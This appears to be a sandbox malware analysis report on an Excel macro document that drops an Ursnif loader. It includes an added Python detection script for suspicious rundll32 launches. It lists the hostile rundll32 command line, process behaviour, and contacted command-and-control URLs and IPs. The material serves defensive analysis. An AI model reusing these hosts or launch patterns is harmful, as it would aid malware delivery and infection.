Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E28EB 7_2_001E28EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002154 7_2_10002154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003144A2 7_2_003144A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00314094 7_2_00314094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031B11C 7_2_0031B11C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031554A 7_2_0031554A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003127A7 7_2_003127A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003197F2 7_2_003197F2
Document contains embedded VBA macros
Source: document-1771131239.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
Source: Joe Sandbox View Dropped File: C:\Users\user\fikftkm.thj2 A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
Yara signature match
Source: document-1771131239.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1771131239.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@26/72@10/7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 7_2_0031757F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00317B5D SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket, 7_2_00317B5D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\D5CE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBCAA.tmp
Source: document-1771131239.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:620 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3064 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:603152 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:1520647 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
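The process tree above is what the Sigma hit "Microsoft Office Product Spawning Windows Shell" in the signature summary is keyed on: EXCEL.EXE launches rundll32 with a module given by a relative path (..\fikftkm.thj2, resolved against the user root where the report shows the PE being dropped), a non-DLL extension, and the DllRegisterServer export, which is regsvr32's job rather than rundll32's. Five launches (fikftkm.thj through .thj4) appear, but only the .thj2 one spawns the 32-bit child under SysWOW64 and only fikftkm.thj2 exists as a dropped file, which is consistent with the four "Automated click: OK" entries being rundll32 error dialogs for names that were never written. The Python below is an added example, not part of the report and not a Sigma rule: it evaluates constructed Sysmon-style process-creation records modelled on the report's tree (plus a benign control) and adds two checks the parent/child pairing alone does not make, the module's extension and location, and the export name.

```python
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe"}
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                      "msiexec.exe", "bitsadmin.exe"}
DLL_EXTENSIONS = {".dll", ".cpl", ".ocx"}

# Constructed Sysmon Event ID 1 style records modelled on the report's process tree.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\fikftkm.thj2,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32 ..\fikftkm.thj2,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign control case
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Matches "rundll32", "rundll32.exe" or a full path to it, then captures the rest.
RUNDLL32_CMD = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.+?)\s*$', re.I)


def split_rundll32(cmdline):
    """Return (module, entry_point) from a rundll32 command line, else (None, None).
    Handles a quoted module path; the entry point is the token after the comma."""
    m = RUNDLL32_CMD.match(cmdline)
    if not m:
        return None, None
    rest = m.group(1)
    if rest.startswith('"') and rest.find('"', 1) > 0:
        close = rest.find('"', 1)
        module, tail = rest[1:close], rest[close + 1:]
    else:
        head = re.match(r"([^,\s]+)(.*)", rest)
        module, tail = head.group(1), head.group(2)
    tail = tail.strip(" ,")
    entry = tail.split()[0] if tail else None
    return module, entry


def evaluate(event):
    """Return the list of rule names the event matches (empty if none)."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    alerts = []
    if parent in OFFICE_IMAGES and image in SHELLS_AND_LOLBINS:
        alerts.append("office_spawns_shell_or_lolbin")
    if image == "rundll32.exe":
        module, entry = split_rundll32(event["CommandLine"])
        if module:
            if ntpath.splitext(module)[1].lower() not in DLL_EXTENSIONS:
                alerts.append("rundll32_module_without_dll_extension")
            if module.startswith("..") or "\\users\\" in module.lower():
                alerts.append("rundll32_module_relative_or_user_path")
            if entry and entry.lower() == "dllregisterserver":
                alerts.append("rundll32_dllregisterserver_export")
    return alerts


if __name__ == "__main__":
    for i, event in enumerate(EVENTS):
        print(i, event["CommandLine"], "->", evaluate(event))
```

The second record matters for tuning: once the 64-bit rundll32 has re-launched itself under SysWOW64 the Office parent is gone, so a rule that only looks at the parent/child pair misses it, while the module and export checks still fire.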

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001745 LoadLibraryA,GetProcAddress, 7_2_10001745
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push eax; mov dword ptr [esp], 00000004h 7_2_001E61AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push esi; mov dword ptr [esp], 00001000h 7_2_001E61B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push 00000000h; mov dword ptr [esp], ebp 7_2_001E6267
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push dword ptr [ebp-10h]; mov dword ptr [esp], ecx 7_2_001E34A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push dword ptr [ebp-0Ch]; mov dword ptr [esp], ecx 7_2_001E3632
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push 00000000h; mov dword ptr [esp], edx 7_2_001E37FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push edx; mov dword ptr [esp], 00000002h 7_2_001E384A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push 00000000h; mov dword ptr [esp], ecx 7_2_001E38D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-24h]; mov dword ptr [esp], ebx 7_2_001E1927
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], ecx 7_2_001E1B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], esi 7_2_001E1CD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], esi 7_2_001E1D37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-20h]; mov dword ptr [esp], esi 7_2_001E1DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], ebp 7_2_001E1E4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-20h]; mov dword ptr [esp], ecx 7_2_001E1F23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebp 7_2_001E110A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebx 7_2_001E1146
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebp 7_2_001E118E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push ebp; mov dword ptr [esp], 00000002h 7_2_001E1270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx 7_2_001E12E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax 7_2_001E4648
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push ebp; mov dword ptr [esp], 00000003h 7_2_001E46A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push ebx; mov dword ptr [esp], 00F00000h 7_2_001E46AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6633 push dword ptr [ebp-08h]; mov dword ptr [esp], eax 7_2_001E66E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6633 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx 7_2_001E6736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-08h]; mov dword ptr [esp], esp 7_2_001E644D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], edi 7_2_001E64EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], ecx 7_2_001E657A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], ebp 7_2_001E65D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-08h]; mov dword ptr [esp], eax 7_2_001E66E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx 7_2_001E6736

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003112D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 7_2_003112D4

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001745 LoadLibraryA,GetProcAddress, 7_2_10001745
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E2DF5 or edx, dword ptr fs:[00000030h] 7_2_001E2DF5

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: document-1771131239.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Yara detected Xls With Macro 4.0
Source: Yara match File source: document-1771131239.xls, type: SAMPLE
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031269C cpuid 7_2_0031269C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 7_2_1000102F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 7_2_0031269C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 7_2_10001850
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

Behavior Graph ID: 381643, Sample: document-1771131239.xls, Startdate: 04/04/2021, Architecture: WINDOWS, Score: 100 (the graph of processes, dropped files, contacted hosts and triggered signatures is rendered as an image and is not reproducible in text)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
207.174.213.126 | vts.us.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
162.241.62.4 | mundotecnologiasolar.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
5.100.155.169 | ponchokhana.com | United Kingdom | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
185.243.114.196 | under17.com | Netherlands | 31400 | ACCELERATED-ITDE | true
198.50.218.68 | comosairdoburaco.com.br | Canada | 16276 | OVHFR | false
192.185.129.4 | accesslinksgroup.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
185.186.244.95 | urs-world.com | Netherlands | 35415 | WEBZILLANL | true

Contacted Domains

Name | IP | Active
mundotecnologiasolar.com | 162.241.62.4 | true
urs-world.com | 185.186.244.95 | true
accesslinksgroup.com | 192.185.129.4 | true
ponchokhana.com | 5.100.155.169 | true
under17.com | 185.243.114.196 | true
vts.us.com | 207.174.213.126 | true
comosairdoburaco.com.br | 198.50.218.68 | true
login.microsoftonline.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://urs-world.com/joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C_2Fr_2/BvjUBKxN9qSpN/cMrTRJ9N/ryJsB4qGY2XHLtxrLDi6xNR/Qw5QsDCu2a/1byqzLlxunqNEdxwm/2jiPBdqZB0a1/q3egY2VhZv3/_2B8x5gL2kXG3P/aL1YXODRbtNtTkBrj3PS7/G.akk | false | Avira URL Cloud: safe | unknown
http://urs-world.com/joomla/nFzk0Q7K/E1_2F1CEOHcU967kDpuCuCt/FPWRV6etYO/3uHaVD2_2B5fz4cnT/KUnSOvHj3DDx/LEjym6jOHzl/FeVIuhKblVVnxm/VI6rPV0WA0nCSJBKKjggZ/tlqJBc8y5_2Bbir_/2BCa9ubsQQgGaAg/T_2BNOyNXybfs33Qg4/rm7s6e4PI/6eyckn37N5jlypeo4jei/kAPiG95T_2BrCVeX6k0/F0E8zUcKkiS/aU.akk | false | Avira URL Cloud: safe | unknown
http://urs-world.com/joomla/3aDSi90Odm4t/ZQseS7mEKQ6/SSE8Q3crCb0l7w/wIvpan0x1HXuZM3ORESMa/ajJiFPV258iNRovg/KQl9frzLJWGuawc/zcW8IHCp_2F8n02ZSX/SkuilVzI4/iu_2BjoqlDfmKu_2BuVf/kGitIl_2Bi7_2Fz9R6X/Y0sd4k8W3UrfPrzXwVLvdK/7G4iHN0OcM5_2/FPqyROS_/2BKDOK08.akk | false | Avira URL Cloud: safe | unknown
http://urs-world.com/favicon.ico | false | Avira URL Cloud: safe | unknown